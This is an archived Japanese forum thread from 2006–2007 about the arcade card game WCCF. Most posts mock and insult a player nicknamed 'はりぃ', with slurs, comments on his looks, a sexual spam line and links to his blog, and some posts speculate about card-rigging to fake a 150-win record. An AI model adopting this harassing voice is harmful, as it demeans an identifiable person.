&#1795;&#1845;&#1846;&#1847;&#1963;&#1965;&#2402;

[23253-196] 魔人 2006/11/10(金)02:56
   2006/11/09(木)
00:56:45

補正B

まず…
補正を論じる以前に、WCCFの事を知らない奴…世の中を知らないが多すぎる。

@選手の良さは、キラ≧白だと思っている奴がいる。

本当ですよね!選手の良さは、模様≧キラ≧白ですよね。w
あれ?2サテでしたっけ?www

[23253-197] 竃◆xRtF8Lvo 2006/11/12(日)15:04
   http://dp.tosp.co.jp/index.php?action=blog_view_entry&topFlag=1&ocd=user&oid=1293535

[23253-198] 魔人 2006/11/19(日)22:35
   また、アク禁になった。
今回は3日ももったからな。
多少は成長してるのかな?はりぃも w

[23253-199] フューリー 2006/11/22(水)15:31
   おいおい俺も書き込み禁止にされたよw
しかも基地街に勝手に削除されたから
名前欄に文句を書いて投稿したら書き込み禁止ww
あいつホントに沸点低いなw小学生以下だよww

[23253-200] 虚無僧 2006/11/22(水)18:17
   子供いるんだ
家も建てたんだ


WCCFサイトやめろよ
なんだよあの無法地帯掲示板て

[23253-201]   2006/11/22(水)19:18
   子供も家も妄想ですよーww
そもそもあの顔と性格で抱かれる女がどこにいるよww

[23253-202] 魔人 2006/11/22(水)19:45
   無法地帯ではりぃのクリスマスってあるけど、はりぃはメイドカフェには行かんでしょ。
プライドだけは異常に高いから、行きたくてもその日だけは行かないよ。

おそらくはりぃはブルーシートで出来た6LDKの家(11/14の日記参照)でケーキにみたてたメロンパンにロウソクを立てて「メリークリスマス」って言いながら、独り寂しくクリスマスイブを過ごすんだろうね。

さすがのはりぃでも同情するよ!………プッ

[23253-203] ウォッチャー 2006/11/22(水)21:16
   荒らし?っていうか喧嘩売ってる相手に対するレスの速さと多さはある意味ですごい
はりぃさんは相手を低脳とかぼろくそに言ってる時が一番おもしろいですね
あんな掲示板作ってるのを身内が見たら恥ずかしい思いするでしょう
WGの人たちもどう思ってるんだろうね
僕は彼が知り合いにいたら最悪です

[23253-204] イチモツ教授 2006/11/22(水)21:25
   はりぃに負けた気違いども〜カリ鍛えてるか〜

シコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキシコシコヌッキヌッキ

[23253-205]   2006/11/22(水)21:31
   ウワアーー!!
基地外さまがで〜たぞ〜!

[23253-206] オックス 2006/11/23(木)07:35
   >>203
WGの奴らもハリィと同レベルなんだから、別に恥だなんて思わんよ。
それどころか、同意してんじゃねーの(笑)

[23253-207] うっぷす 2006/11/23(木)14:43
   充分、恥だと思うが。

[23253-208] ぷっ 2006/11/23(木)18:06
   無法地帯掲示板無くなったぞ。
WGの奴らからなにか言われたのか?ワラw

[23253-209] ウォッチャー 2006/11/24(金)20:26
   あらら、喧嘩売ってた兵庫の子はどうなったのかな
よくわからないまま終わったかな
あれだけ騒いでおいて何事も無かったようにしてる管理人もイイ神経してるわ

後は日記見てキチ○イっぷりを晒してくれるのを待つだけかな

WGの珍さんだっけ、WGかどうかは知らないけど
無法ではりぃさんと一緒にギャーギャー言ってたから
彼と同類だね
流石にこれ以上はいないと思いますけどね

[23253-210] イチモツ教授 2006/11/24(金)22:21
   はりぃは気違い〜

[23253-211] 魔人 2006/11/25(土)06:54
   無法地帯掲示板がなくなったのは、俺が魔法のiらんどに通報したからだよ。

ちなみにこれが、返信で帰ってきた。
『魔法のiらんどコミュニティサポートです。ご連絡いただきましたHP:hurrykazu1に
つきましては警告しました。ご報告ありがとうございます。今後とも魔法のiらんど
を宜しくお願い致します。
「教えてアイポリス」http://ip.tosp.co.jp/portal/c.asp?i=OSH00IPO01

[23253-212] やれやれ 2006/11/25(土)08:17
   自慢げに語ってるが、ようは
『悔しいからチクりました』
だろ?

[23253-213] つ■ 2006/11/25(土)08:31
   魔人よくやった。

[23253-214] 魔人 2006/11/25(土)10:06
   [23253-212]

おそらく悔しいのは、はりぃの方じゃないかな?w

[23253-215] 2006/11/25(土)14:46
   エンドレスにあげ

[23253-216] たけし 2006/12/04(月)12:29
   月曜日の朝から削除しまくりだった。
本当に仕事してんのかな?若しくは仕事中にサイトのチェックをやってんのか?

[23253-217]   2006/12/04(月)13:04
   魔人さん乙です。

つかアソコはアイポリスの「HP管理者10か条」
すら守れてねえから本当ならHP自体閉鎖は当たり前なんだがなww

[23253-218] 2006/12/22(金)18:44
   [3856]

[23253-219] 2006/12/23(土)13:12
   今日大会出るらしいです。

[23253-220] 2006/12/26(火)19:35
   彼は予選敗退でした。

[23253-221] 2006/12/26(火)23:10
   日記に友人が150勝全冠したて書いてあったw

[23253-222] 150勝 2006/12/28(木)15:38
   確かに書いてあった。
友達居ないからもちろん妄想だけどね。

[23253-223] 2006/12/29(金)00:07
   サイトに入れない

[23253-224] 2006/12/29(金)15:26
   さっき覗きに行ったんだけど、はりぃの所に集まってる奴もキモくて頭悪いのばっかだね。
よく写メとか出てるけど本物なの?
なんとなくひっぱたきたくなっちゃうフェイスしてるよね。

[23253-225] どうせ俺は三流ソフトバンク ひりぃWG 2006/12/29(金)15:41
   はりぃて変わらんな。今も昔も…

まだ(爆)とかやってんだ(爆


魔人>おつ〜

昔ゼウスだっけ?はりぃ叩き専用サイトなかった?
これからも頑張れ。

[23253-226] 150勝の話 2006/12/29(金)17:05
   150勝0敗の話は事実です。
俺もその人と対戦しまったので、150勝のチームの話は妄想ではない。
150勝との対戦結果は引き分けですた。

[23253-227] 2006/12/29(金)17:33
   それなら画像を貼れば良いのに。

[23253-228] 2006/12/29(金)20:21
   ん?引き分ける時点で150勝は無くなるが?

[23253-229] ええ? オトン 2006/12/29(金)20:36
   226の書き込みは釣りだよね?
まさか引き分けを一回でもしたら150勝出来ないなんて知らない訳じゃないよね?

それともこれが噂のハリー信者クオ?

[23253-230] 150勝の話 2006/12/29(金)23:42
   今行われている全国大会の予選で対戦したときに150勝で監督任期終了後のICカード使ってしたんで、何回その人とやっても150勝0敗でしょ
画像張らないのは、その人に迷惑かかるからとはりぃが判断したのと違うかな?
150勝の人は全国大会へ出場した人ですよ

[23253-231] は? オトン 2006/12/30(土)00:37
   勝敗だけなら監督名やチーム名もわからず載せれるつー話しだろ?
それより監督称号のゴッドを公式の監督ランキングから探した方が早いかな。

[23253-232] ウォッチャー 2006/12/30(土)03:49
   まぁ150勝したのはツレであって本人じゃないんだから
日記見てるとはりぃさんは相変わらずコミュニケーション無さ過ぎ

それとWG名乗ってるけどホントにWGの人達、リーダーさんとかと仲良いのかな
何人かエリア進出してるのにその事について一言も書いてない
ああ、自分が地区大会優勝できないから日記でセガに対してギャーギャー言ってるだけか
お友達さん誰か止めなよ、見てて恥ずかしいぞ

[23253-233] 2006/12/30(土)05:26
   ランキングにゴッドいたよ。

81 ゴッド Samstar(B R A Z I L)
新宿スポーツランド本館 57億3304万円

とりあえず1〜2000位をサラッと見た中ではゴッドはコイツだけ。

[23253-234] 2006/12/30(土)07:44
   先生はイケメンだお

[23253-235] 2007/01/04(木)12:12
   はりぃのつらマジできもいのでアゲ

[23253-236] 2007/01/04(木)14:17
   先生はイケメンだお

[23253-237] 2007/01/10(水)22:36
   噂の150勝見ました。

[23253-238] 150勝の話 2007/01/10(水)22:53
   だから、本当だって言っているのに信用しないんだから・・・
150勝の人は店舗予選通過したから、150勝のチームを関西Bエリア大会で見れるかもしれないよ

[23253-239] 2007/01/11(木)03:34
   最高78連勝みたいだけど78勝0敗は結構出来るから、
そこから人が居ない時間を狙って、軍団の八百長でカップ戦を獲得すれば2周もいけないことも無いな。

とてつもない時間と財力が必要だがw

[23253-240] 2007/01/11(木)07:24
   色んな意味でプロセスが見たいですね

[23253-241] ん? 2007/01/11(木)07:30
   以前、はりぃは150勝0敗は絶対に無理だと、言ってなかったか?
気のせいか??

[23253-242] ぃりは てか 2007/01/11(木)12:39
   少し違うよ。
作ったのは店員が閉店後に負け用に回し用のICや落とし物のICとか使って作成。
78の勝ち数は全冠2周の数とほぼ一緒で
78連勝なのは単純に72試合フレンドリーやったからだよ。
ローカルに出てないのは決勝で不正出来ないから負ける可能性があるし勝ったら勝ったでローカルチャンプに名前が残るので昨日のチャンプにバレる恐れもあるから取ってない。
セガにチクるとセガは全設置店の稼動記録が見れるので監督名や順位で店が特定されると店に何等かのペナルティーがいくかもね

[23253-243] 2007/01/11(木)14:23
   なるほど・・・

78連勝は2周分で残りはフレンドリかなとは思っていたが
「0分け」の方法がどうしても浮かばなかったので
↑のやり方をやれば確かに可能だ・・・

[23253-244] 中山 2007/01/11(木)15:48
   8サテフル稼働か・・・
すごいな・・・

[23253-245] すみませんが・・・ おお 2007/01/11(木)18:10
   150勝の画像はどこへ行ったらミレますか??

[23253-246] 2007/01/11(木)18:54
   ↑ハリぃ日記

[23253-247] 2007/01/12(金)09:01
   age

[23253-248] おお 2007/01/12(金)12:47
   みたきました。
あ、さん。ありがとうございます。

[23253-249] 2007/01/12(金)13:07
   どうやら画像加工はしていないみたいだな。

しかし、0敗はいけそうな人は何人かいたが0敗0分は
とてもじゃないが↑にあるような不正でもしないと達成は不可能に思える。

[23253-250] 2007/01/12(金)16:43
   先生はイケメンだお(^-^)

[23253-251] 242へ だから・・・ 2007/01/13(土)00:26
   >作ったのは店員が閉店後に負け用に回し用のICや落とし物のICとか使って作成

230に全国大会出た人って書いたてあるだろ
店員と推測するところで242は、はりぃに頭やられてます

[23253-252] だから… 242 2007/01/13(土)01:10
   ゲーセン店員も大会に出れるわけ。
もしくは本人が作ったICじゃなくても借りて他人が大会に出れるわけ。

[23253-253] はぁ 2007/01/13(土)17:40
   それにしてもは○ぃは頭いかれてんな

[23253-254] 2007/01/17(水)15:45
   おい!おまいら!
はりいに喧嘩売った勇者が出たぞ!

HN=山田太郎

[23253-255] 2007/01/19(金)13:15
   どこで?

[23253-256] ありの 2007/01/19(金)13:46
   またはりぃの吉害が再発してるw
日記内で小学生並みの口喧嘩を繰り広げてるよw

[23253-257] プッ 2007/01/19(金)14:30
   あいつヤッパリ頭お菓子いねw

[23253-258] プゲラ 2007/01/20(土)01:48
   アゲ

[23253-259] プゲラ 2007/01/20(土)10:49
   アゲ

[23253-260] (・∀・) 2007/01/20(土)16:14
   まったく、はりぃは・・http://dp.tosp.co.jp/index.php?ocd=user&oid=1293535&page=1&tno=&eno=1681&pno=0&topFlag=1&action=blog_view_comment_list

[23253-261] うわ 2007/01/21(日)02:14
   また変な日記かいとる、あいつ大丈夫なのか?  病気!?

[23253-262] ウォッチャー 2007/01/21(日)03:34
   酷すぎる、会社で仕事が何やらとか書いてるけど
魔人叩きの所見たらひくねこりゃ

[23253-263] 2007/01/21(日)22:14
   あげ

[23253-264] ぱりぃ 2007/01/22(月)11:42
   先生の妄想日記はすごいお

[23253-265] 2007/01/23(火)01:02
   気持ちわるいのであげ

[23253-266] さっさ 2007/01/23(火)18:42
   これ上げると変な書き込み増えるか
テストの晒し上げ

[23253-267] 2007/01/23(火)22:58
   あげw

[23253-268] 2007/01/23(火)23:32
   あげw

[23253-269] 2007/01/24(水)02:42
   あげ

[23253-270] なぜ 2007/01/24(水)03:01
   このスレをあげるとアド貼り荒らしが…?
あぁなるほど彼の仕業ねw

[23253-271] 2007/01/26(金)23:04
  

[23253-272] カマキリ 2007/01/28(日)21:44
   あげます


<前の1件]


[2024/04/23 22:32] WCCF掲示板過去ログ 管理人 ミヤムーウェブ
スレッド天国 ver.1.10